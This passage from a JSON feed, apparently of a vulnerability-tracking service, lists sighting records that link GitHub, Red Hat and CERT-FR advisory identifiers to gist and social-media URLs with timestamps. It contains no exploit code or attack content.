"type": "seen", "source": "https://gist.github.com/konard/65ced3fd74042bf5ba0737f60d57d145", "content": "", "creation_timestamp": "2026-01-19T00:13:20.000000Z"}, {"uuid": "e2647fcf-eb1b-41db-862c-a2ec074cae0d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-53q9-r3pm-6pq6", "type": "seen", "source": "https://gist.github.com/konard/65ced3fd74042bf5ba0737f60d57d145", "content": "", "creation_timestamp": "2026-01-19T00:13:20.000000Z"}, {"uuid": "015f051a-d519-4139-a93c-77de4361c426", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jw8x-6495-233v", "type": "seen", "source": "https://gist.github.com/konard/045d80a762f6e756763e0ef7e0895c77", "content": "", "creation_timestamp": "2026-01-19T00:16:50.000000Z"}, {"uuid": "307e9510-a71d-48de-9922-222ed0917f2a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-53q9-r3pm-6pq6", "type": "seen", "source": "https://gist.github.com/konard/045d80a762f6e756763e0ef7e0895c77", "content": "", "creation_timestamp": "2026-01-19T00:16:50.000000Z"}, {"uuid": "78f4d88a-dc38-4c40-881e-fa9e9d779ed5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jw8x-6495-233v", "type": "seen", "source": "https://gist.github.com/konard/ed57bdf6f23e9388249c3e81f52a7d40", "content": "", "creation_timestamp": "2026-01-19T00:16:42.000000Z"}, {"uuid": "47ba5866-bb63-4905-b9b2-588634b491c8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-53q9-r3pm-6pq6", "type": "seen", "source": "https://gist.github.com/konard/ed57bdf6f23e9388249c3e81f52a7d40", "content": "", "creation_timestamp": "2026-01-19T00:16:42.000000Z"}, {"uuid": "d3cebf8c-b59b-4169-ba75-be0e235a1e59", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-73rr-hh4g-fpgx", "type": "seen", "source": "https://bsky.app/profile/azu.bsky.social/post/3mcrdwzkc3y25", "content": "", "creation_timestamp": "2026-01-19T09:40:08.502021Z"}, {"uuid": "6c922bb7-71b8-4c0f-b73b-7d18870ce5e0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wr3c-345m-43v9", "type": "seen", "source": "https://bsky.app/profile/sublimer.mstdn.sublimer.me.ap.brid.gy/post/3mcrevnz2zq42", "content": "", "creation_timestamp": "2026-01-19T09:59:15.128716Z"}, {"uuid": "ea2f9643-5b65-490d-b673-4b4a1bfe9118", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xm59-rqc7-hhvf", "type": "seen", "source": "https://gist.github.com/konard/40de109ee72a45e2927884fb295a7c2f", "content": "", "creation_timestamp": "2026-01-19T11:23:31.000000Z"}, {"uuid": "3119053a-34bf-4714-9b77-d926b70d2c66", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jw8x-6495-233v", "type": "seen", "source": "https://gist.github.com/konard/a0178709d5a7b5a78586698b8c042b15", "content": "", "creation_timestamp": "2026-01-19T11:29:46.000000Z"}, {"uuid": "903cbb0d-dddc-4493-a134-3cae47f51018", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-53q9-r3pm-6pq6", "type": "seen", "source": "https://gist.github.com/konard/a0178709d5a7b5a78586698b8c042b15", "content": "", "creation_timestamp": "2026-01-19T11:29:46.000000Z"}, {"uuid": "a020b6cd-cf94-4573-9a92-fd50ea60fb36", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-53q9-r3pm-6pq6", "type": "seen", "source": "https://gist.github.com/konard/d776e828509d5f2e3644437ac5400628", "content": "", "creation_timestamp": "2026-01-19T11:35:26.000000Z"}, {"uuid": "c6423edd-07c0-47f3-ae98-1a684bdf3ec7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-53q9-r3pm-6pq6", "type": "seen", "source": "https://gist.github.com/konard/042845fbf63e049778752df088c0c9e4", "content": "", "creation_timestamp": "2026-01-19T11:37:28.000000Z"}, {"uuid": "96b2829b-df01-4552-9e0e-46283d356010", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-53q9-r3pm-6pq6", "type": "seen", "source": "https://gist.github.com/konard/08fd90cacf8e8afb761d96df585a5e71", "content": "", "creation_timestamp": "2026-01-19T11:37:35.000000Z"}, {"uuid": "56be06f8-84f6-47da-a1c6-7882db876684", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-53q9-r3pm-6pq6", "type": "seen", "source": "https://gist.github.com/konard/315f497a299da0e6e8f57daa9874a05a", "content": "", "creation_timestamp": "2026-01-19T12:00:23.000000Z"}, {"uuid": "02c58e29-a151-43db-81db-cedcc929c742", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2026-ACT-002", "type": "seen", "source": "https://bsky.app/profile/cert-fr.bsky.social/post/3mcrrqv3oq52n", "content": "", "creation_timestamp": "2026-01-19T13:47:14.850328Z"}, {"uuid": "202ce74e-c5c7-423c-a339-bb7127e1588c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2026-ACT-002", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/115922071296350254", "content": "", "creation_timestamp": "2026-01-19T13:47:18.521866Z"}, {"uuid": "12bdd5e4-c72a-45c4-9a95-7ac1ecce1588", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2026-ACT-002", "type": "seen", "source": "https://bsky.app/profile/infosecfr.skyfleet.blue/post/3mcrxt25bmw2x", "content": "", "creation_timestamp": "2026-01-19T15:35:49.937478Z"}, {"uuid": "ff9d0ba7-b45c-42e1-abe1-ea5e0f0ff669", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0804", "type": "seen", "source": "https://gist.github.com/Darkcrai86/1dc570efdc170c19b28669d32ff4182e", "content": "", "creation_timestamp": "2026-01-19T17:05:31.000000Z"}, {"uuid": "ada0ac01-fe70-4d63-976f-bf528670249c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0793", "type": "seen", "source": "https://gist.github.com/Darkcrai86/5733d01f4609e44169d659f2644db436", "content": "", "creation_timestamp": "2026-01-19T17:06:20.000000Z"}, {"uuid": "5caadac9-805c-4fe9-a76d-d0f64a1a9186", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0786", "type": "seen", "source": "https://gist.github.com/Darkcrai86/db2f1083976905b46a70e2074005d2f9", "content": "", "creation_timestamp": "2026-01-19T17:07:14.000000Z"}, {"uuid": "779de651-e517-4ccf-8a2f-b4860f861772", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0771", "type": "seen", "source": "https://gist.github.com/Darkcrai86/13d445e43dc593ffe2e90f0eb0336760", "content": "", "creation_timestamp": "2026-01-19T17:08:12.000000Z"}, {"uuid": "83f3dc29-6078-4dd9-bc31-c7e5f514289d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0759", "type": "seen", "source": "https://gist.github.com/Darkcrai86/f223978ad99ec50c5ff223a9cc405760", "content": "", "creation_timestamp": "2026-01-19T17:09:23.000000Z"}, {"uuid": "12343e35-327a-4842-8b78-2f77b6f96c51", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0770", "type": "seen", "source": "https://gist.github.com/Darkcrai86/a658d93d17d942a6dadeec7a9c4dcf9c", "content": "", "creation_timestamp": "2026-01-19T17:09:03.000000Z"}, {"uuid": "dfbf4807-cec4-45e8-85b6-19df834ffd19", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0755", "type": "seen", "source": "https://gist.github.com/Darkcrai86/99cf549f8205466cd6c05ee7c5c4f624", "content": "", "creation_timestamp": "2026-01-19T17:10:29.000000Z"}, {"uuid": "f55faa65-332b-470f-954c-e75404e37cef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0753", "type": "seen", "source": "https://gist.github.com/Darkcrai86/26090bed2127472f1b985f33fa3c88ce", "content": "", "creation_timestamp": "2026-01-19T17:09:57.000000Z"}, {"uuid": "11ca95fa-e666-41f1-935b-252536641d56", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0752", "type": "seen", "source": "https://gist.github.com/Darkcrai86/413814d3d3fea677fd7cdbc1b7373db4", "content": "", "creation_timestamp": "2026-01-19T17:11:18.000000Z"}, {"uuid": "fd4736bd-ae58-4131-b498-d73d5eb55518", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0747", "type": "seen", "source": "https://gist.github.com/Darkcrai86/596944e5c82c106a06300d5cb729338e", "content": "", "creation_timestamp": "2026-01-19T17:12:14.000000Z"}, {"uuid": "0b6c6128-664d-4171-b25d-bcf3d151c0f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0751", "type": "seen", "source": "https://gist.github.com/Darkcrai86/f7d7e8fca8351071bea7f2800690284f", "content": "", "creation_timestamp": "2026-01-19T17:11:41.000000Z"}, {"uuid": "3ab71e0c-8778-4a78-a0aa-ca85e4a7fa5c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0742", "type": "seen", "source": "https://gist.github.com/Darkcrai86/ddd5bc33b02f17817c55f6c2c48d87e9", "content": "", "creation_timestamp": "2026-01-19T17:13:24.000000Z"}, {"uuid": "cd868fdf-61f2-435f-aadd-db37b14d17fe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0743", "type": "seen", "source": "https://gist.github.com/Darkcrai86/c236da0a255cafb76ea569df0871b7c4", "content": "", "creation_timestamp": "2026-01-19T17:13:03.000000Z"}, {"uuid": "3e974e66-9cc3-4b68-bcec-c59547946d04", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5h86-8mv2-jq9f", "type": "seen", "source": "https://gist.github.com/konard/2f071c4633544cee29412109ee72a019", "content": "", "creation_timestamp": "2026-01-19T22:03:49.000000Z"}, {"uuid": "88c55489-f344-4baf-bf96-61e5d5bf4d51", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-54jq-c3m8-4m76", "type": "seen", "source": "https://gist.github.com/konard/2f071c4633544cee29412109ee72a019", "content": "", "creation_timestamp": "2026-01-19T22:03:49.000000Z"}, {"uuid": "c02b80b3-1f9a-4a78-922e-08cc7a466e5b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:1014", "type": "seen", "source": "https://gist.github.com/Darkcrai86/78d8b8337436d9ef75bd692938a1f1d2", "content": "", "creation_timestamp": "2026-01-22T15:51:22.000000Z"}, {"uuid": "c6a95f82-8f31-4792-9d60-d0318c5a5a93", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2762-657x-v979", "type": "seen", "source": "https://infosec.exchange/users/DarkWebInformer/statuses/115939609108003343", "content": "", "creation_timestamp": "2026-01-22T16:07:21.814967Z"}, {"uuid": "881dc145-594a-4c42-85b8-f921c98fddcd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0928", "type": "seen", "source": "https://gist.github.com/Darkcrai86/7d02f94b83ed0fc68cb95c866c3e50e7", "content": "", "creation_timestamp": "2026-01-23T07:25:37.000000Z"}, {"uuid": "f531cd40-639b-4e46-95dc-b228d7df4310", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2026-ALE-001", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/115983706971608725", "content": "", "creation_timestamp": "2026-01-30T11:02:01.538338Z"}, {"uuid": "7a0f658e-77ab-47e0-a0c1-8d7384dbfbe6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xwh2-742g-w3wp", "type": "seen", "source": "https://gist.github.com/alon710/0f23f90ebd00cf0880364b7701d73814", "content": "", "creation_timestamp": "2026-01-24T21:26:42.000000Z"}, {"uuid": "aa9e08d5-65fa-49a5-8cf2-c6815f966c5d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-38jv-5279-wg99", "type": "seen", "source": "https://gist.github.com/alon710/3ca5a4af3c088b8bc8c692cf49f776d2", "content": "", "creation_timestamp": "2026-01-24T21:26:41.000000Z"}, {"uuid": "d88b2018-f720-416a-b5a7-fcf84de0f0b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-379q-355j-w6rj", "type": "seen", "source": "https://gist.github.com/alon710/68b038ac6bda1421acbb111df8ace3b9", "content": "", "creation_timestamp": "2026-01-24T21:26:40.000000Z"}, {"uuid": "77a10e6e-ab6e-4604-9c4c-93e378f45483", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fg6f-75jq-6523", "type": "seen", "source": "https://gist.github.com/alon710/635c03fe79914f517969edc1a5109de0", "content": "", "creation_timestamp": "2026-01-24T21:26:39.000000Z"}, {"uuid": "d9c8eef9-f6e7-4260-ab04-ede09380bb52", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-h4rf-624j-gj33", "type": "seen", "source": "https://gist.github.com/alon710/37fabe1fa2ec64ffc9106dcc65d66121", "content": "", "creation_timestamp": "2026-01-24T21:26:38.000000Z"}, {"uuid": "bc266cc2-78dd-47b1-9596-459c8fc2e390", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PC9J-5V36-2MWW", "type": "seen", "source": "https://gist.github.com/alon710/4168158bdc42a1017e72ec3633e1f2e1", "content": "", "creation_timestamp": "2026-01-24T21:26:36.000000Z"}, {"uuid": "b3b7df0f-d6dd-4bd8-a70e-322fc0284a5f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78p6-6878-8mj6", "type": "seen", "source": "https://gist.github.com/alon710/9d592803b409bdc5758e55f190201ff6", "content": "", "creation_timestamp": "2026-01-24T21:26:31.000000Z"}, {"uuid": "8fe95d53-aae8-4669-a5cc-92da0edd739e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-h4rm-mm56-xf63", "type": "seen", "source": "https://gist.github.com/alon710/5d7a9e9874d9e5a5af04636b8ad4a8c1", "content": "", "creation_timestamp": "2026-01-24T21:26:30.000000Z"}, {"uuid": "03be975a-e4f4-4f40-b1b1-c3059c06f232", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78H3-63C4-5FQC", "type": "seen", "source": "https://gist.github.com/alon710/d599287a0a6fd7d1a45a12ea36a66b82", "content": "", "creation_timestamp": "2026-01-24T21:26:27.000000Z"}, {"uuid": "05c15ea6-604c-4e74-a873-33863534e51f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w3g8-fp6j-wvqw", "type": "seen", "source": "https://gist.github.com/alon710/878cd9236baa69530b4f35d4110af1c3", "content": "", "creation_timestamp": "2026-01-24T21:26:26.000000Z"}, {"uuid": "3a895991-d546-41a6-a441-73a804a83f75", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-p523-jq9w-64x9", "type": "seen", "source": "https://gist.github.com/alon710/c8add6ece19cd5df0f9821f5ca4dad6a", "content": "", "creation_timestamp": "2026-01-24T21:26:21.000000Z"}, {"uuid": "82a9b49c-1b4e-45d8-8a1d-ddec63aa3e1a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wvpq-h33f-8rp6", "type": "seen", "source": "https://gist.github.com/alon710/cab39bb7b7e9c041bbe78dfe671c1cec", "content": "", "creation_timestamp": "2026-01-24T21:26:19.000000Z"}, {"uuid": "3066c36c-80d0-4152-b004-8ef9eaf3153e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-637h-ch24-xp9m", "type": "seen", "source": "https://gist.github.com/alon710/da4b5598ab6a4049cc5df6da22e394e9", "content": "", "creation_timestamp": "2026-01-24T21:26:03.000000Z"}, {"uuid": "f575ec18-fda1-4428-8876-cc2d9cb1172a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pcwc-3fw3-8cqv", "type": "seen", "source": "https://gist.github.com/alon710/caa5cb4168284b12971dd626b93e298b", "content": "", "creation_timestamp": "2026-01-24T21:25:58.000000Z"}, {"uuid": "b995df79-4cea-4b81-98e6-0461ce13370a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mwr6-3gp8-9jmj", "type": "seen", "source": "https://gist.github.com/alon710/a25aa09000a1d1f82d296241e718f577", "content": "", "creation_timestamp": "2026-01-24T22:40:53.000000Z"}, {"uuid": "089a83f9-8953-43b7-a1f0-96cd7f401c6b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-585Q-CM62-757J", "type": "seen", "source": "https://gist.github.com/alon710/11c32d6bbe7707493c9a1e7a8151071b", "content": "", "creation_timestamp": "2026-01-24T21:26:11.000000Z"}, {"uuid": "65e4a9fd-e05c-434d-84f7-3785e8babcd3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4f6g-68pf-7vhv", "type": "seen", "source": "https://gist.github.com/alon710/e5a93d732ac6484870ad550d8066ea64", "content": "", "creation_timestamp": "2026-01-24T21:26:10.000000Z"}, {"uuid": "890651f2-00fc-4f46-b5d7-6a6940f34a86", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4XC4-762W-M6CG", "type": "seen", "source": "https://gist.github.com/alon710/d0d64a6b47dd3930f853faaddb139d32", "content": "", "creation_timestamp": "2026-01-24T21:26:09.000000Z"}, {"uuid": "af9011e8-a873-4aed-a390-df7830b6b7d9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-88q6-jcjg-hvmw", "type": "seen", "source": "https://gist.github.com/alon710/7d72130b31a9e6a47f1517e8d0e061e1", "content": "", "creation_timestamp": "2026-01-24T21:26:08.000000Z"}, {"uuid": "d91be0a5-0fc0-4305-9ae7-1550d8118ee1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2g22-wg49-fgv5", "type": "seen", "source": "https://gist.github.com/alon710/e76d8e58dcc89b6a3002c30580fbeb4c", "content": "", "creation_timestamp": "2026-01-24T21:26:05.000000Z"}, {"uuid": "b81f70d5-c934-4451-af24-97a1ee88d10f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gxxc-m74c-f48x", "type": "seen", "source": "https://gist.github.com/alon710/b274d24af14fa6b3d017a948e89a5c9f", "content": "", "creation_timestamp": "2026-01-24T21:26:02.000000Z"}, {"uuid": "46d71d5d-add9-4486-8e3c-3ead135605e3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4f6g-68pf-7vhv", "type": "seen", "source": "https://gist.github.com/alon710/e674a091497c87216f8bbb1417187e78", "content": "", "creation_timestamp": "2026-01-24T21:26:01.000000Z"}, {"uuid": "0790541b-f12b-4e63-9e6d-8289e970cd5f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4xc4-762w-m6cg", "type": "seen", "source": "https://gist.github.com/alon710/af7f1621d94bc4520e512228571073ac", "content": "", "creation_timestamp": "2026-01-24T21:26:00.000000Z"}, {"uuid": "a866c970-4ec0-41fe-aad7-c740de87774a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6mq8-rvhq-8wgg", "type": "seen", "source": "https://gist.github.com/alon710/99d0d42ce006226e776c5e02ad2adab0", "content": "", "creation_timestamp": "2026-01-24T21:30:57.000000Z"}, {"uuid": "59f324d3-2f7d-440f-a503-a3ee6df00b39", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-m9rg-mr6g-75gm", "type": "seen", "source": "https://gist.github.com/alon710/b70008cd0d3543423cac3701baf19f75", "content": "", "creation_timestamp": "2026-01-24T21:30:56.000000Z"}, {"uuid": "6af5173f-7dfb-4ad0-969e-5b45093025ab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wjpc-4f29-83h3", "type": "seen", "source": "https://gist.github.com/alon710/7c8bb443b95f54d5687b35d332436adb", "content": "", "creation_timestamp": "2026-01-24T21:30:46.000000Z"}, {"uuid": "d711a251-ebff-4ee6-a548-ffc82af3f791", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78h3-63c4-5fqc", "type": "seen", "source": "https://gist.github.com/alon710/e9d490d21198cd45592a72ece5cdad17", "content": "", "creation_timestamp": "2026-01-24T21:25:59.000000Z"}, {"uuid": "f069f7a7-aea2-4488-b435-7f4d8f4844b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hj4w-hm2g-p6w5", "type": "seen", "source": "https://gist.github.com/alon710/af42a5d08be0444aa26b262702b2cf50", "content": "", "creation_timestamp": "2026-01-24T21:25:56.000000Z"}, {"uuid": "93b07b11-61eb-4a36-bfa3-8b8eb0bc35a3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0383", "type": "seen", "source": "https://gist.github.com/alon710/d7f08bcd33b6c370d97dd604754351e7", "content": "", "creation_timestamp": "2026-01-24T21:25:55.000000Z"}, {"uuid": "71d908bf-69b5-4dd3-81e4-4d53d27293b5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-p483-wpfp-42cj", "type": "seen", "source": "https://gist.github.com/alon710/eb4350488656919e0e819887c0ca38af", "content": "", "creation_timestamp": "2026-01-24T21:25:53.000000Z"}, {"uuid": "caa43a2f-2882-4e01-bb20-9c8b1ac05e40", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-255j-qw47-wjh5", "type": "seen", "source": "https://gist.github.com/alon710/6dcac1219deca9881442e326eb5060fa", "content": "", "creation_timestamp": "2026-01-24T21:31:10.000000Z"}, {"uuid": "66223a0c-25ad-445d-95ee-f91cac77dcc3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HQF9-8XV5-X8XW", "type": "seen", "source": "https://gist.github.com/alon710/6ece0e6f8b35b33d759e8493148369c9", "content": "", "creation_timestamp": "2026-01-24T21:31:09.000000Z"}, {"uuid": "685d2c90-c6b4-48e5-ac67-998c0845f7a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HQF9-8XV5-X8XW", "type": "seen", "source": "https://gist.github.com/alon710/97491250cd95bc835ebfe51fcfbf1308", "content": "", "creation_timestamp": "2026-01-24T21:31:08.000000Z"}, {"uuid": "fb524b6e-c43c-4d86-86fe-5ac5d63f619c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-824x-88xg-cwrv", "type": "seen", "source": "https://gist.github.com/alon710/4c81f028594a171b5c4a96a4003f42ef", "content": "", "creation_timestamp": "2026-01-24T21:31:07.000000Z"}, {"uuid": "7ec2d04b-6570-4c78-802c-65cb2459c54c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-824x-88xg-cwrv", "type": "seen", "source": "https://gist.github.com/alon710/75d522285aa4f8205a292f3cbfca4009", "content": "", "creation_timestamp": "2026-01-24T21:31:06.000000Z"}, {"uuid": 